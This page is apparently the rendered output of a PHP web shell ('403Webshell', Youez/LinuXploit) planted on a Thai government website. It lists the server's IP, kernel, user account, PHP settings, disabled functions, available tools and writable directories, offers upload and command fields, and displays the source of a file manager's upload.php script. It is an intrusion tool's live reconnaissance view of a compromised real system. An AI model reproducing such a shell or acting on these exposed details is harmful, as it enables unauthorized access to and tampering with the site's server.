403Webshell
Server IP : 43.241.58.20  /  Your IP : 216.73.216.25
Web Server : Apache/2
System : Linux ns1-1556229.dragonhispeed.com 3.16.0 #1 SMP Fri Mar 29 22:50:14 MSK 2024 x86_64
User : ratsitne ( 1130)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/ratsitne/domains/tessabalpatiu.go.th/public_html/cdn/filemanager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/ratsitne/domains/tessabalpatiu.go.th/public_html/cdn/filemanager/upload.php
<?php
include('config/config.php');
if($_SESSION["verify"] != "RESPONSIVEfilemanager") die('forbiden');
include('include/utils.php');


$storeFolder = $_POST['path'];
$storeFolderThumb = $_POST['path_thumb'];

$path_pos=strpos($storeFolder,$current_path);
$thumb_pos=strpos($_POST['path_thumb'],$thumbs_base_path);
if($path_pos!==0 
    || $thumb_pos !==0
    || strpos($storeFolderThumb,'../',strlen($thumbs_base_path))!==FALSE
    || strpos($storeFolderThumb,'./',strlen($thumbs_base_path))!==FALSE
    || strpos($storeFolder,'../',strlen($current_path))!==FALSE
    || strpos($storeFolder,'./',strlen($current_path))!==FALSE )
    die('wrong path');


$path=$storeFolder;
$cycle=true;
$max_cycles=50;
$i=0;
while($cycle && $i<$max_cycles){
    $i++;
    if($path==$current_path)  $cycle=false;
    if(file_exists($path."config.php")){
	require_once($path."config.php");
	$cycle=false;
    }
    $path=fix_dirname($path).'/';
}


if (!empty($_FILES)) {
    $info=pathinfo($_FILES['file']['name']);
    if(in_array(mb_strtolower($info['extension']), $ext)){
	$tempFile = $_FILES['file']['tmp_name'];   
	  
	$targetPath = $storeFolder;
	$targetPathThumb = $storeFolderThumb;
	$_FILES['file']['name'] = fix_filename($_FILES['file']['name']);
	 
	if(file_exists($targetPath.$_FILES['file']['name'])){
	    $i = 1;
	    $info=pathinfo($_FILES['file']['name']);
	    while(file_exists($targetPath.$info['filename'].".[".$i."].".$info['extension'])) {
		    $i++;
	    }
	    $_FILES['file']['name']=$info['filename'].".[".$i."].".$info['extension'];
	}
	$targetFile =  $targetPath. $_FILES['file']['name']; 
	$targetFileThumb =  $targetPathThumb. $_FILES['file']['name'];
	
	if(in_array(mb_strtolower($info['extension']),$ext_img)) $is_img=true;
	else $is_img=false;
	
	
	move_uploaded_file($tempFile,$targetFile);
	chmod($targetFile, 0755);
	
	if($is_img){
	    $memory_error=false;
	    if(!create_img_gd($targetFile, $targetFileThumb, 122, 91)){
		$memory_error=false;
	    }else{
		if(!new_thumbnails_creation($targetPath,$targetFile,$_FILES['file']['name'],$current_path,$relative_image_creation,$relative_path_from_current_pos,$relative_image_creation_name_to_prepend,$relative_image_creation_name_to_append,$relative_image_creation_width,$relative_image_creation_height,$fixed_image_creation,$fixed_path_from_filemanager,$fixed_image_creation_name_to_prepend,$fixed_image_creation_to_append,$fixed_image_creation_width,$fixed_image_creation_height)){
		    $memory_error=false;
		}else{		    
		    $imginfo =getimagesize($targetFile);
		    $srcWidth = $imginfo[0];
		    $srcHeight = $imginfo[1];
		    
		    if($image_resizing){
			if($image_resizing_width==0){
			    if($image_resizing_height==0){
				$image_resizing_width=$srcWidth;
				$image_resizing_height =$srcHeight;
			    }else{
				$image_resizing_width=$image_resizing_height*$srcWidth/$srcHeight;
			}
			}elseif($image_resizing_height==0){
			    $image_resizing_height =$image_resizing_width*$srcHeight/$srcWidth;
			}
			$srcWidth=$image_resizing_width;
			$srcHeight=$image_resizing_height;
			create_img_gd($targetFile, $targetFile, $image_resizing_width, $image_resizing_height);
		    }
		    //max resizing limit control
		    $resize=false;
		    if($image_max_width!=0 && $srcWidth >$image_max_width){
			$resize=true;
			$srcHeight=$image_max_width*$srcHeight/$srcWidth;
			$srcWidth=$image_max_width;
		    }
		    if($image_max_height!=0 && $srcHeight >$image_max_height){
			$resize=true;
			$srcWidth =$image_max_height*$srcWidth/$srcHeight;
			$srcHeight =$image_max_height;
		    }
		    if($resize)
			create_img_gd($targetFile, $targetFile, $srcWidth, $srcHeight);
		}
	    }		
	    if($memory_error){
		//error
		unlink($targetFile);
		header('HTTP/1.1 406 Not enought Memory',true,406);
		exit();
	    }
	}
    }else{
	header('HTTP/1.1 406 file not permitted',true,406);
	exit();
    }
}else{
    header('HTTP/1.1 405 Bad Request', true, 405);
    exit();
}
if(isset($_POST['submit'])){
    $query = http_build_query(array(
        'type'      => $_POST['type'],
        'lang'      => $_POST['lang'],
        'popup'     => $_POST['popup'],
        'field_id'  => $_POST['field_id'],
        'fldr'      => $_POST['fldr'],
    ));
    header("location: dialog.php?" . $query);
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit